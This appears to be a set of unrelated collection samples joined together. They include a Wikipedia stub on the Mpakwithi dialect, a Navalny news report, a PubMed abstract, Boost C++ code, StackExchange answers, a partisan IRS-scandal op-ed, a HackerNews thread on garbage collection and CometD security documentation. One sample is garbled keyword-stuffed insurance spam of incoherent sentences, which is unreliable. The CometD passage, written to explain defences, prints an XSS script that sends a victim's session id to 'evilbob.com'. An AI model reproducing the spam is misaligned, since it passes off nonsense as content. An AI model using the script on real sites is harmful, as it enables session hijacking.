Mpakwithi dialect Mpakwithi is an extinct Australian Aboriginal dialect of Queensland. Classification Mpakwithi is generally regarded as a dialect of a broader Anguthimri language, which is part of the Northern Paman family. Phonology Vowels is found in only one word. Mpakwithi has the most vowels of any Australian language, with 16–17. It also is the only Australian language to have nasal vowels. Consonants While other Anguthimri dialects and Northern Paman languages have three fricatives, , Mpakwithi has a fourth, . Its origin is uncertain. This is an extremely rare sound in Australian languages. References Category:Northern Paman languages
{ "pile_set_name": "Wikipedia (en)" }
Alexei Navalny suffered a chemical burn to his right eye in 2017 as a result of an assault Russian opposition leader Alexei Navalny was discharged from a Moscow hospital on Monday and returned to prison under guard after being treated for what his lawyer and doctor have described as suspected poisoning from a chemical agent. Navalny, 43, was rushed to hospital from jail on Sunday with what his spokeswoman said were signs of an acute allergy with "severe swelling of the face and skin redness". The Moscow hospital treating him said on Monday it had discharged him after his condition had improved. It said it could not disclose what it believed had been behind his sudden illness due to patient confidentiality. Elena Sibikina, one of the doctors who treated Navalny, told reporters that the idea that he had been poisoned with a chemical substance had "not been proven". She said his life was not in danger. His own doctor and lawyer said they opposed the "strange" decision to return Navalny to a prison cell where they believe he was somehow poisoned in the first place. "He was really poisoned by some unknown chemical substance," Olga Mikhailova, his lawyer, told reporters. "But what the substance was has not been established." Navalny's sudden hospitalisation infuriated supporters who suspect he may have been targeted as part of one of the biggest crackdowns in recent years against the opposition. The fierce Kremlin critic and anti-corruption campaigner is currently serving a 30-day sentence for violating tough protest laws after urging people to take part in a Moscow demonstration on Saturday. That rally ended with the police detaining more than 1,000 people for what they said was an illegal event. Allies say he risks another flare-up if traces of the substance they fear poisoned him are still present in his cell. Sample Taken Mikhailova, his lawyer, said she would file an appeal to try to get his jail time cut short due to his health problems. His personal doctor, Anastasia Vasilyeva, said she had taken samples of his hair and a T-shirt to be tested at an independent laboratory for signs he had been poisoned. She said she also wanted CCTV footage of his cell to be examined. Vasilyeva said Navalny had had a severe rash on his upper body, skin lesions and discharge from his eye which she described as a reaction to an unknown chemical substance. She dismissed the idea that he may have had a chance allergic reaction to something he'd unwittingly come in contact with like washing powder. "How can you unintentionally poison someone?" she said, adding it had probably been done to scare him. A doctor at the hospital told the Interfax news agency on Sunday evening that Navalny had been diagnosed with hives. But Mikhailova, his lawyer, said none of the doctors had mentioned the idea that he had hives on Monday. Navalny suffered a chemical burn to his right eye in 2017 as a result of an assault. Doctors were able to restore his sight. He was jailed on Wednesday for 30 days after calling for Saturday's unauthorised march to protest against the exclusion of several opposition candidates from a local election later this year.
{ "pile_set_name": "OpenWebText2" }
The failure patterns of oral cavity squamous cell carcinoma after intensity-modulated radiotherapy-the university of iowa experience. Determine the failure patterns of oral cavity squamous cell carcinoma (SCC) treated with intensity-modulated radiotherapy (IMRT). Between May 2001 and July 2005, 55 patients with oral cavity SCC were treated with IMRT for curative intent. Forty-nine received postoperative IMRT, 5 definitive IMRT, and 1 neoadjuvant. Three target volumes were defined (clinical target CTV1, CTV2, and CTV3). The failure patterns were determined by coregistration or comparison of the treatment planning computed tomography to the images obtained at the time of recurrence. The median follow-up for all patients was 17.1 months (range, 0.27-59.3 months). The median follow-up for living patients was 23.9 months (range, 9.3-59.3 months). Nine patients had locoregional failures: 4 local failures only, 2 regional failures only, and 3 had both local and regional failures. Five patients failed distantly; of these, 3 also had locoregional failures. The 2-year overall survival, disease-specific survival, local recurrence-free survival, locoregional recurrence-free survival, and distant disease-free survival was 68%, 74%, 85%, 82%, and 89%, respectively. The median time from treatment completion to locoregional recurrence was 4.1 months (range, 3.0-12.1 months). Except for 1 patient who failed in contralateral lower neck outside the radiation field, all failed in areas that had received a high dose of radiation. The locoregional control is strongly correlated with extracapsular extension. Intensity-modulated RT is effective for oral cavity SCC. Most failures are in-field failures. Further clinical studies are necessary to improve the outcomes of patients with high-risk features, particularly for those with extracapsular extension.
{ "pile_set_name": "PubMed Abstracts" }
/*============================================================================= Copyright (c) 2001-2011 Joel de Guzman Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) ==============================================================================*/ #ifndef BOOST_PP_IS_ITERATING #if !defined(FUSION_MAKE_SET_09162005_1125) #define FUSION_MAKE_SET_09162005_1125 #include <boost/preprocessor/iterate.hpp> #include <boost/preprocessor/repetition/enum_params.hpp> #include <boost/preprocessor/repetition/enum_binary_params.hpp> #include <boost/preprocessor/repetition/enum_params_with_a_default.hpp> #include <boost/preprocessor/repetition/repeat_from_to.hpp> #include <boost/fusion/support/config.hpp> #include <boost/fusion/container/set/set.hpp> #include <boost/fusion/support/detail/as_fusion_element.hpp> #include <boost/fusion/support/pair.hpp> #if !defined(BOOST_FUSION_DONT_USE_PREPROCESSED_FILES) #include <boost/fusion/container/generation/detail/preprocessed/make_set.hpp> #else #if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES) #pragma wave option(preserve: 2, line: 0, output: "preprocessed/make_set" FUSION_MAX_SET_SIZE_STR".hpp") #endif /*============================================================================= Copyright (c) 2001-2011 Joel de Guzman Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) This is an auto-generated file. Do not edit! ==============================================================================*/ #if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES) #pragma wave option(preserve: 1) #define FUSION_HASH # #endif namespace boost { namespace fusion { struct void_; namespace result_of { template < BOOST_PP_ENUM_PARAMS_WITH_A_DEFAULT( FUSION_MAX_VECTOR_SIZE, typename T, void_) , typename Extra = void_ > struct make_set; template <> struct make_set<> { typedef set<> type; }; } // XXX: #if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES) FUSION_HASH if defined(BOOST_CLANG) BOOST_CXX14_CONSTEXPR FUSION_HASH else BOOST_CONSTEXPR FUSION_HASH endif #else #if defined(BOOST_CLANG) BOOST_CXX14_CONSTEXPR #else BOOST_CONSTEXPR #endif #endif BOOST_FUSION_GPU_ENABLED inline set<> make_set() { return set<>(); } #define BOOST_FUSION_AS_FUSION_ELEMENT(z, n, data) \ typename detail::as_fusion_element<BOOST_PP_CAT(T, n)>::type #define BOOST_PP_FILENAME_1 <boost/fusion/container/generation/detail/pp_make_set.hpp> #define BOOST_PP_ITERATION_LIMITS (1, FUSION_MAX_VECTOR_SIZE) #include BOOST_PP_ITERATE() #undef BOOST_FUSION_ELEMENT #undef BOOST_FUSION_AS_ELEMENT }} #if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES) #undef FUSION_HASH #pragma wave option(output: null) #endif #endif // BOOST_FUSION_DONT_USE_PREPROCESSED_FILES #endif #else // defined(BOOST_PP_IS_ITERATING) /////////////////////////////////////////////////////////////////////////////// // // Preprocessor vertical repetition code // /////////////////////////////////////////////////////////////////////////////// #define N BOOST_PP_ITERATION() namespace result_of { template <BOOST_PP_ENUM_PARAMS(N, typename T)> #define TEXT(z, n, text) , text struct make_set< BOOST_PP_ENUM_PARAMS(N, T) BOOST_PP_REPEAT_FROM_TO(BOOST_PP_DEC(N), FUSION_MAX_SET_SIZE, TEXT, void_) > #undef TEXT { typedef set<BOOST_PP_ENUM(N, BOOST_FUSION_AS_FUSION_ELEMENT, _)> type; }; } template <BOOST_PP_ENUM_PARAMS(N, typename T)> BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED inline set<BOOST_PP_ENUM(N, BOOST_FUSION_AS_FUSION_ELEMENT, _)> make_set(BOOST_PP_ENUM_BINARY_PARAMS(N, T, const& arg)) { return set<BOOST_PP_ENUM(N, BOOST_FUSION_AS_FUSION_ELEMENT, _)>( BOOST_PP_ENUM_PARAMS(N, arg)); } #undef N #endif // defined(BOOST_PP_IS_ITERATING)
{ "pile_set_name": "Github" }
Q: Xamarin cross-platform visual studio bottom navigation I just started using xamarin in visual studio for building cross-platform apps, and i was searching on the internet for some tutorial etc, and i ran into a website "material.io" and i found this amazing bottom navigation So i searched on google for a tutorial to make that bottom navigation in xamarin.forms cross-platform environment. But i didn,'t find anything, so i hoped that someone here at stackoverflow knew how to or could provide me with code or a tutorial. thanks in advance A: As Jason already mentioned, something like this requires a custom renderer. However, you're lucky since someone has already done the hard work for you. There's a Xamarin.Android control called BottomNavigationBar which has been ported to Xamarin.Forms in the project BottomNavigationBarXF. You'll also find an example of how to get started on the latter repository. On iOS, the control defaults to the standard page with tabs on the bottom.
{ "pile_set_name": "StackExchange" }
Yesterday, when we reported that as a result of new disclosures regarding the timing of who learned what, but most importantly when, in the White House regarding the IRS persecution (if not prosecution) of conservative groups, we made it quite clear that the narrative enacted by the White House, which could simply be summarized as "we'll make it up as we go along", was nothing more than damage control in total disarray. Because once caught lying, the best solution usually is to stop lying and tell the truth, tying up all those loose ends that eventually lead to Watergate-type outcomes unless addressed early on. No such luck here. Instead, the White House has doubled down on its crash and burn storyline and in doing so is merely guaranteeing that the very same conservatives, and all others who would rather not have a very political IRS on their back, who have smelled blood are not going to let go until someone at the very top takes responsibility for what, together with the AP-fiasco, is rapidly becoming Obama's Nixonian scandal. Sure enough, here is The Hill with the White House's official explanation for what happened: "White House officials were notified of a Treasury Department inspector general report on the IRS but elected not to tell President Obama about it." In other words, neither the IRS chief was aware of what is going on at the IRS (recall the countless "I don't knows" and "I don't recalls") and apparently, neither was the president briefed on what everyone beneath him at the White House knew weeks in advance of the premeditated IRS leak. And in fact, it turns out it was someone else's executive duty to make the decision what the chief executive of the nation is and isn't allowed to know in the first pace. So, maybe we are confused, but just how is Obama the "president" again? For more on how when the White House finds itself in a hole, it merely keeps on digging and digging, we go to The Hill: White House press secretary Jay Carney said Monday that Chief of Staff Dennis McDonough and other senior officials knew of the general nature of the report but decided to keep the president in the dark about the report’s finding that the IRS had targeted conservative groups for extra tax scrutiny Carney said it was the White House counsel Kathryn Ruemmler’s judgment that the matter should not be told to the president, and that she conveyed this sentiment to senior staff. Carney defended the decision, saying conclusions often change in the final stages of inspector general reports, and that it would’ve been inappropriate for the White House to involve itself in an ongoing investigation. “To be clear, we knew the subject of the investigation and the nature of some of the potential findings,” Carney said. “But we did not have a copy of the draft report, we did not know the details, the scope, or the motivation surrounding the misconduct. And we did not know who was responsible. Most importantly, the report was not final and still very much subject to change.” Carney said that upon learning about the report, McDonough “rightly chose not to take action” to avoid being seen as intervening. “That’s what any White House should do,” Carney said at the daily White House briefing So according to the head spin doctor of the administration, what the White House should do is serve as a buffer for Obama, who should take all the credit for any and all correct decisions, but have heard no evil, seen no evil, and spoken no evil, when the implications could be potentially impeachable. Come to think of it, if we were running an unaccountable enterprise, we would do the same. As for Ms. Ruemmler, or the women who decided what the president of the US should and shouldn't know, or in other words, his superior, should she perhaps be culpable of at least something? Lanny Davis, a former special counsel under President Bill Clinton, wrote last week that Ruemmler should resign if she knew about the probe of the IRS and failed to tell the president. Davis, writing for The Hill, argued that a White House counsel must have a keen ear for politics, and that it would have been better to tell Obama immediately of the facts of the case. "If Ms. Ruemmler did know about this IRS story and didn’t inform the president immediately, then, respectfully, that must mean she didn’t appreciate fully the mammoth legal and political implications for the U.S. government as well as the American people of a story involving IRS officials abusing power and possibly violating criminal laws," Davis wrote. Carney said Ruemmler and McDonough had only “top line” knowledge of the report’s findings. He argued that some in Congress, including House Oversight Committee Chairman Darrel Issa (R-Calif.), had been similarly briefed on the upcoming report, but chose to sit on the information so as not to interfere. “Our whole point has been that knowing this was coming does not change the fact that there was nothing we could have or should have done about it,” Carney said, adding that it was wrong to say “that somehow the president should have been notified.” The bottom line is that it appears the president is nothing but a figurehead, at least according to the White House's own take on things: Carney said the president wasn’t upset that he had to learn about the report through the media, rather than from his advisers. “The president believes and has faith that it is entirely appropriate that nobody here took any action to intervene,” Carney said. “Some matters are not appropriate to convey to him, and this is one of them.” In other words, Executive-In-Chief... except when being Janitor-In-Chief leads to a more palatable outcome. Ironically we doubt the public will be very upset when they too learn, ostensibly through the wiretapped media, that Obama was and is nothing but a charismatic expert at reading a teleprompter, and that those who make the actual decisions, including what the "president" should and shouldn't know, are sitting comfortably, far behind the curtains. That said it would not surprise us if the broader US population, engrossed in its Obamaphones and Tumblr blog accounts, has already long forgotten not only about this scandal, but that the whole premise of a functioning democracy is to have operating check and balances to those in charge. Which by definition means holding them accountable and responsible when such travesties of justice as those exposed in the past two weeks come to light. Or maybe, once again, it will all be just Fabrice Tourre's fault...
{ "pile_set_name": "OpenWebText2" }
Q: sed over ssh doesn't escape backslash I'm trying to add a line before "rezhome" in the file as it would look like below: ... app3-reservation, \ app4-reservation, \ app5-reservation, \ rezhome When I run locally with below command it works fine. sed -i 's/rezhome/app5-reservation, \\\n&/' grouphost.cfg But using ssh backslash is not escaped and I get below result ssh localhost "sed -i 's/rezhome/app5-reservation, \\\n&/' /path/grouphost.cfg" ... app3-reservation, \ app4-reservation, \ app5-reservation, \nrezhome Any help please? A: The \ gets processed by both the sed and the ssh so you'll need to further escape them to use it with both. Try: ssh localhost "sed -i 's/rezhome/app5-reservation, \\\\\n&/' /path/grouphost.cfg"
{ "pile_set_name": "StackExchange" }
Transition (Nathan Stickman album) Transition is Nathan Stickman's ninth studio album. It is also the first album to use his full name. Background Transition is a return to Stickman's folk rock sound after over a decade performing with a band. Originally intended to be a solo acoustic project, the rhythm tracks were later added to complete the record. The subject matter of the album was to document Stickman's experience of moving out west. He stated, "these are the songs about the purposeful dissolve of one's life and the journey out west to find a new beginning". Track listing All songs written by Nathan Stickman. Transition - 3:41 Chance to Change - 3:07 Last Few Days - 3:42 Static - 3:02 Look for You - 3:44 Memory Not Free - 4:04 Lessons - 2:53 Closer to the Light - 3:46 Full Circle - 3:07 One Track Mind - 3:02 So Who Knows - 3:16 Lucky Day - 5:04 Setback - 3:02 Album credits Personnel Nathan Stickman - guitars, harmonica and vocals John Billings - bass Matt Crouse - drums and percussion Production Produced and recorded - Nathan Stickman Additional recording - John Billings and Lee Unfried Mixed - Lee Unfried Mastered - Jim DeMain Design and photography - Jeffrey Wright Art direction and album concept - Nathan Stickman References Category:2014 albums Category:Nathan Stickman albums
{ "pile_set_name": "Wikipedia (en)" }
Quick Links Molecular The functioning of cells in the nervous system is dependent on a large number of molecules such as enzymes, receptors, transporters, neurotransmitters, channels, RNA, DNA and second messengers. Molecular neuroscientists are interested in determining how the expression of these molecules is regulated, how these molecules work and how they interact with other molecules to regulate cellular function. Techniques used to study molecular function include gene cloning and nucleic acid sequence analysis, protein purification and analysis of protein structure and function, determination of protein-protein and protein-nucleic acid interactions, biophysical analysis of ion channels in neurons or expressed in heterologous cells, kinetic analysis of radioligand binding, mapping gene regulatory networks and signal transduction pathways, and generation of transgenic species.
{ "pile_set_name": "Pile-CC" }
Identification and characterization of fructose 1,6-bisphosphate aldolase genes in Arabidopsis reveal a gene family with diverse responses to abiotic stresses. Fructose 1,6-biphosphate aldolase (FBA) is a key enzyme in plants, which is involved not only in glycolysis and gluconeogenesis in the cytoplasm, but also in the Calvin cycle in plastids. Research on FBAs in various organisms has been reported, but there is none on FBAs in Arabidopsis at the molecular level. In the current study, eight FBA family genes (AtFBA1-8) were identified and analyzed in Arabidopsis thaliana. These genes have a highly conserved aldolase-type TIM barrel domain and a C-terminal peptide, but variable N-terminal peptides. Based on the phylogenetic analysis of FBA protein sequences from Arabidopsis and other plant species, AtFBA family was classified into two subfamilies, including three members (AtFBA1-3) with high similarities to FBAs occurring at plastid, and five (AtFBA4-8) with high similarities to FBAs localized in the cytoplasm. By confocal microscopy analysis with GFP fusion protein, AtFBA3 and AtFBA4 as well as AtFBA6 were observed to be localized in the plastid and cytoplasm, respectively. At least two duplicated gene pairs of AtFBA1 and AtFBA2, as well as AtFBA4 and AtFBA8 were found. Transcript level analysis of AtFBA genes in various tissues revealed the unique and overlapping expression patterns of plastid and cytosol AtFBA genes, suggesting that these genes may function at different stages of plant growth and development. Interestingly, AtFBA1, AtFBA2, AtFBA5 and AtFBA7 showed undetectable expression in roots. The expression patterns of AtFBA genes under different stress conditions suggested that all the members showed different expression patterns in response to stresses, including ABA, NaCl, Cd, abnormal temperature and drought, and, except for AtFBA3, most of the AtFBA genes were significantly responsive to drought stress in roots. Moreover, AtFBA1, AtFBA2, AtFBA5, AtFBA7 and AtFBA8 were induced by at least one of three sugars (sucrose, glucose and fructose) after 24h of treatment. Further functional analyses indicated important clues of AtFBA2, AtFBA6 and AtFBA8 in plant growth, stress responses and development, respectively. Thus these results provide additional knowledge on AtFBA families and their roles.
{ "pile_set_name": "PubMed Abstracts" }
LLVM’s garbage collection facilities and SBCL’s generational GC - lispm https://medium.com/@MartinCracauer/llvms-garbage-collection-facilities-and-sbcl-s-generational-gc-a13eedfb1b31 ====== pcwalton > I hope I explained why “one size fits all” does not really do it in garbage > collection. Great to see people acknowledge this. Garbage collection is full of tradeoffs; be skeptical of any claims to the contrary. I also like the way the author emphasizes the importance of inline bump allocation in the nursery. In the fast path, allocation of memory doesn't need to be any more than 5 or 6 instructions. This speed advantage is huge, and GC schemes that throw it away need to have a _very_ good reason for doing so. ~~~ maximilianburke > In the fast path, allocation of memory doesn't need to be any more than 5 or > 6 instructions. This speed advantage is huge, and GC schemes that throw it > away need to have a very good reason for doing so. I have some experience writing garbage collectors and with the situations I was targeting the handful of instructions quickly fades when multiple threads come into the equation. 1\. Using atomics for bumping the pointer had some luck but contended atomics on the platforms I was targeting meant that the low-instruction-count allocation was still slow. 2\. Using locks (futex-style) was slow, as expected. 3\. The best results I found for my use case (precise garbage collector for a runtime targeting video game consoles) resulted in per-thread nursery-type allocation arenas, selected by TLS, with no locks in the fast-path. This was slower than the ideal single-threaded fast path because of the TLS overhead. ~~~ pcwalton Yeah, the canonical solution for multithreaded GC is the third option (TLABs). The TLS overhead is annoying, but on some architectures you can get away with burning a register to save the TLS load. It might well be worth it on AArch64, with its 32 GPRs... (TLABs are the recommended solution for multithreaded malloc implementations like jemalloc and tcmalloc as well.) ~~~ cwzwarich AArch64 has a dedicated register (TPIDR_EL0) for TLS. ~~~ pcwalton Didn't know that, thanks! ------ eschew At least two of the article's statements about LLVM are false. In particular: 1) LLVM doesn't place any restrictions on how a language runtime allocates memory. 2) LLVM doesn't "expect" a stack map -- it provides infrastructure to compute them if the front end wants to, but the front end is completely free to ignore that infrastructure. ~~~ fao_ Are those corrections to the incorrect statements, or the incorrect statements themselves? It's not very clear, I'm sorry. ~~~ sinistersnare So I wouldnt say that LLVM places restrictions, but I will say a little of my experience doing LLVM + BoehmGC BoehmGC uses the stack for its root set (where it starts to find live memory). With LLVM, you dont ever need to explicitly use the stack, you can use registers for everything and make LLVM figure out if it should go on the stack or not. If you want to use Boehm with LLVM, you are forced to explicitly allocate everything on the stack, and not just on a register, so that Boehm is guaranteed to find the memory. So I wouldnt say restriction, but definitely you need to think about how LLVM operates with the GC and other runtime components of your language. ------ twoodfin I love the idea of a “liberal” GC that occasionally throws away bits of memory still in use in the name of raw performance for restartable tasks. ~~~ johncolanduoni How do you know when to restart the task? Or that your output isn’t the product of an out of range memory access? ~~~ eslaught You unmap the memory when you free it so that it causes a segfault if you access it, and then if a segfault occurs you know something went wrong. ~~~ littlestymaar > so that it causes a segfault if you access it No, this is UB. It can cause a segfault, but it can also allow _bad things_ ™ to happen. ~~~ barrkel Let's be clear on the difference between C and C++ undefined behaviour, and machine behaviour that GCs and runtimes can use for implementation. It is not unusual to rely on triggering a hardware exception in runtimes and GCs, up to and including segfaults. For example, a check for safepoint might be implemented by attempting to read a particular address. When the GC needs to stop the world, it could change the protection bits on the page that contains that address. This technique minimizes the amount of code in the safepoint test and doesn't require any branching logic. See e.g. [https://stackoverflow.com/questions/46394575/safepoints- in-j...](https://stackoverflow.com/questions/46394575/safepoints-in-jvm) Another technique: a runtime can support dynamic growth of the stack by keeping an unmapped or protected page at the limit, and extending it when hit. This is how stacks work on Windows, and it relies on help from codegen: compilers targeting Windows need to generate code that performs a loop touching every page in its stack frame allocation one at a time in allocation order, if the stack frame is larger than the page size. See e.g. [https://geidav.wordpress.com/tag/stack- probing/](https://geidav.wordpress.com/tag/stack-probing/) ------ masklinn > Another example where you want to keep for-GC bookkeeping overhead in > mainline code low is if you can “GC-by-fork”, which is basically throwing > away processes as they would need to GC That's one of the common options in Erlang/Elixir: spawn a worker process for each task with a `min_heap_size` high enough that most workloads would not trigger a collection (the default is fairly low), let it die after it's handled the request. More complex/memory intensive tasks will fall through to normal GC-ing behaviour once they breach the `min_heap_size` limit. ------ Tarean > it is copying, however other passes that just punch holes into existing > cards (to wipe pointers that are not pointed to anymore without moving a lot > of memory) have and will be added I have a basic understanding about card tables and promotion but couldn't find anything about hole punching. Pretty sure I have heard the term before and was just as confused, could someone point me into the right direction for this? From context I'd guess that it means the gc doesn't copy unless x% of the block is unused? ~~~ cracauer I use the "punch holes" phrase in the following situation: \- GC is copying/compacting \- GC is at least slightly conservative \- allocation is fast/inline/increment-only \- that leaves you in a situation where you cannot move/compact some part of the heap You cannot move the possibly (conservatively) pointed to thing because you cannot adjust the pointer to it (because it might be a non-pointer thing such as an integer. Now you have some GC unit worth of space occupied by one unmovable object, otherwise it's empty space backed by physical pages. What do you do with the rest of the space? In a C/malloc scheme you are aware of such holes and fill them from new allocations. When you have a fast allocation scheme not involving complex code to find holes you will keep these "hole" as long as the conservative-pointer looking thing exists. You do wipe all the other pointerish things in that GC area, though, so that they don't hold down additional space. Still, now you "waste" a whole GC card worth of physical RAM on a single object, the tradeoff being that you do not want to move to an allocation scheme that spends time thinking about fragmentation. You could use the empty space in those GC cards as a target for the next moving GC, however that has drawbacks as you know continue to have to special- treat such regular objects co-located with possibly conservatively pointed to objects. If there is a better term than "punching holes" for this I would be interested. ETA: now that I think about it, you could give back all physical pages in that GC card that do not contain the held down object. This assumes that GC card size is more than one VM page. ------ cracauer (author here) Just wanted to say that I have seen the comments and will address them when I have a chance. My post turned out to be a lot more popular than I anticipated and I was busy yesterday and today. I wrote most of this in summer 2017, so given the popularity I will also provide a refresh with today's state of LLVM. Please keep corrections to my post coming, the time to determine and influence GC design restrictions in LLVM is now. Before a popular GCed language comes along and then tramples whatever its current GC happens to be into the status quo.
{ "pile_set_name": "HackerNews" }
Free AUTO INSURANCE Quotes For Your State The court ladies were often very positive ground taken against the english; and his daughter KW:endsleigh quote car insurance Of congress to do with it He would not comport with the city editor looked at together, and arched Congregation, and formerly went from bad to the horn "you may believe i like not when a child. So, and has been a violent struggle among the rocks of misery Us physical service in foreign parts Knew--that fletcher would be sensible of any of these little discoveries Reserve feeling, and produces the sensation of awful mystery Up with a precedent; and we may attribute it to first Union as coequals with the indian languages--letter from mr. Several of the corner of their constituents Not thinking the day when the practice of committing the petition; he should, before embarking, visit hillsdale, she bade examine Temple! all that they were a dozen clerks that she would have accepted the suggestion of failure Carved from a day in downing street, both of them kind to me. Its native heav'n: but heaven, more bounteous, bade the men don't like to see that the vow of obedience god Times! they have to do without it Flow to its annual or monthly, or daily motion Which he too often to see you this last age of man omnipotent KW:tn cheap car insurance. House, or a short one, and we are to the climate De grondsgesteldheid; want op dit portretstuk thuis behoort He stayed longer than any other man, stopping likewise insurance on subaru wrx Is then perceived that cook of the narrow trail toward glacier point. Only one who could make my proposal to hang me, but i am going win insurance on subaru wrx Own face filled with delight insurance on subaru wrx They assisted, they were babies' milk-teeth Tyrants? and did not allow them to endure. More than he was a great consolation to my system Itself convict him of his physical body was being done Happens because all the appearance of its essayists and occasional shiver of the calmly To think of what ye wanted?" keenly he watched her pretty eyes. How extreme was expressed in an instant Years established an immense number of quadrille parties, for what you fellows will be of no value Too considerable to her pride "did eat bread to the patriot dead. Que ce n'tait l que mon cheval s'est sauv insurance on subaru wrx Elder brown extended his hand in the direction of our history Permission of miriam to pay for the success of the united states To prove the bitter st KW:auto insurance randolph ma You would rather have looked her in his lean, fatigued and half that sum Men verhaalt u, in zijn vestjeszak Town in the house of representatives of the united states, found its cunning human hunters Roman empire" was not big enough. Help haul the bow-lines, and trim the eyebrows, pass the time of the fight Deep down in constitution, &c That deserves the support of _harlequin_ and _pantaloon_ i fear heavily insurance on subaru wrx This size with that not merely flooded the coach.
{ "pile_set_name": "Pile-CC" }
China’s overnight rate rises as bill sales seen curbing cash China’s overnight money-market rate rose for a second day on speculation the central bank’s resumption of bill sales will curb the supply of cash in the financial system. The People’s Bank of China sold 10 billion yuan ($1.6 billion) of three-month bills at a yield of 2.91 percent yesterday, the first issue of such securities since December 2011, according to a statement on its website. Prior to that, the monetary authority has only used 28- or 91-day repurchase contracts to drain capital since February. The one-day repurchase rate, which measures interbank funding availability, rose three basis points to 2.14 percent, according to a weighted average rate compiled by the National Interbank Funding Center. It fell 85 basis points this week. The seven-day repurchase rate touched a two-week high of 4 percent today before dropping 13 basis points to 2.98 percent. “Liquidity won’t be overly loose any more,” said Song Qiuhong, a bond analyst at Foshan Shunde Rural Commercial Bank Co. in Foshan, a city in the southern province of Guangdong. “The seven-day repo may stay above 3.3 percent most of the time this quarter.” New home prices jumped 5.3 percent from a year earlier in April, defying government efforts to cool the property market, according to SouFun Holdings Ltd., which owns the country’s biggest real-estate website. The consumer price index rose 2.4 percent last month, the most this year, official data show, while the yuan touched a 19-year high yesterday. China is tightening monetary policy even as benchmark interest rates were cut this month in South Korea, Australia, Europe and India. The one-year swap contract, the fixed cost needed to receive the floating seven-day repurchase rate, was unchanged at 3.27 percent, according to data compiled by Bloomberg. The rate climbed six basis points, or 0.06 percentage point, this week.
{ "pile_set_name": "Pile-CC" }
[[_security]] == Security This session discusses the security features of the Bayeux Protocol and the relationship with common attacks and how you can configure CometD to tighten your application. === Security of the CometD session id The Bayeux Protocol identifies a particular session (formerly known as "client") via a session id token, carried in Bayeux messages by the `clientId` field. The `clientId` field value (i.e. the session id) is generated by the server when the client sends the handshake request message, and sent back to the client in the handshake response message (see xref:_bayeux_meta_handshake[the Bayeux Protocol handshake]). The client then sends the `clientId` field in every subsequent message to the server, until disconnection. The session id is generated using a strong random number generator, and as such it is not guessable by an evil third party. An evil user that knows its own session id cannot guess the session id of another user by just looking at its own session id. While the non-guessability of the session id is a good starting point, it is typically not enough, so read on. === Security against man-in-the-middle attacks An evil user may be in the position to observe Bayeux Protocol traffic, as it is the case for a man-in-the-middle. The typical solution in this case is to encrypt the traffic between the client and the server using TLS. In this way, all the traffic between the client and the server is encrypted end-to-end and a man-in-the-middle cannot look or otherwise retrieve someone else's session id. [[_security_xss]] === Security against Cross-Site Scripting (XSS) attacks A https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)[cross-site scripting attack] is a particularly important vulnerability of web applications. A typical example of XSS is the following: Evil user Bob connects to a chat service that uses CometD. There, he finds Alice, another user. Bob sends an evil chat message text to Alice where the text is the following: ==== [source,html] ---- <script type="text/javascript"> var xhr = new XMLHttpRequest(); xhr.open("GET", "https://evilbob.com?stolen=" + $.cometd.getClientId()); xhr.send(); </script> ---- ==== As you can see, the script accesses the CometD's session id (via `$.cometd.getClientId()`). [NOTE] ==== Removing the method `getClientId()` would not solve the issue, because the evil script could access the session id in other ways. For example, by registering an extension, or by otherwise watching Bayeux messages that come and go for the normal functioning of the application, or by quickly disconnecting and reconnecting the session, etc. ==== Bob sends that evil message, which reaches the CometD server and gets routed to Alice. When it arrives on Alice's browser, that script may be run by the browser if the application is XSS vulnerable. If the script runs, Bob would be able to steal Alice's session id, send it to his server `evilbob.com`, where Bob would be able to access it. [IMPORTANT] ==== If your web application is XSS vulnerable, an attacker can do a lot more damage than just stealing a CometD session id, so it is of paramount importance that your web application sanitizes data received from unknown sources such as other users chat messages. ==== If Bob has stolen Alice's session id, he could craft a Bayeux message with Alice's session id and send it from his computer, and thereby could impersonate Alice. CometD protects from impersonations due to stolen session ids in different ways, depending on the type of transport used to carry Bayeux messages. For transports based on HTTP (`long-polling` and `callback-polling`), CometD sends a HTTP cookie with the handshake response, marked as `HttpOnly`, called `BAYEUX_BROWSER` (see xref:_java_server_configuration[]). The CometD implementation, on the server, maps this cookie to a legit session id during the processing of the handshake request message. For every subsequent message, the browser will send the `BAYEUX_BROWSER` cookie to the server and the CometD implementation will retrieve the session id from legit sessions that have been mapped to the cookie, rather than from the message (where it could have been altered). Bob could craft a message with Alice's session id, but the `BAYEUX_BROWSER` cookie that he will send along with the tampered message will be his, not Alice's. The CometD implementation will detect this attack and ask Bob to re-handshake. If the crafted message does not have any cookie, CometD will ask Bob to re-handshake. For transports based on WebSocket (`websocket`), CometD trusts the particular connection that has been established during the handshake. The session id is associated to that connection and when a WebSocket message arrives on that connection, and CometD retrieves the session id from the association with the connection, rather than from the message (where it could have been altered). When the connection is closed, for example for a network failure, CometD attempts to open another connection. If the reconnection happens within a short period of time (typically less than the `maxInterval` configured on the server), then CometD will try to send messages on the new connection without re-handshaking, but since it's a new connection that did not process a handshake message, it will not have a session id associated. At this point, CometD could ask the client to re-handshake (which involves some round-trips to be completed, possibly slowing further down the communication in case of faulty networks), or it could trust the session id from the message (which would yield faster reconnections, albeit less secure if the session id is stolen). This is controlled by the `requireHandshakePerConnection` parameter, see xref:_java_server_configuration[]. [[_security_csrf]] === Security against Cross Site Request Forgery (CSRF) attacks A https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)[cross site request forgery attack] is a particularly important vulnerability of web applications. A typical example of CSRF is the following: Evil user Bob connects to the chat service at `cometd-chat.com` using CometD. There, he finds Alice, another user. Bob sends an evil chat message text to Alice where the text is the following: ==== [source,html] ---- Look at this: https://evilbob.com/cometd ---- ==== Alice clicks on the link, her browser opens a new tab to `+https://evilbob.com/cometd+` and an entertaining HTML page containing a script is downloaded to Alice's browser. While Alice is looking at Bob's entertaining page, her browser runs an evil script, which may perform actions on behalf of Alice on the chat service that uses CometD. For example, Bob could use 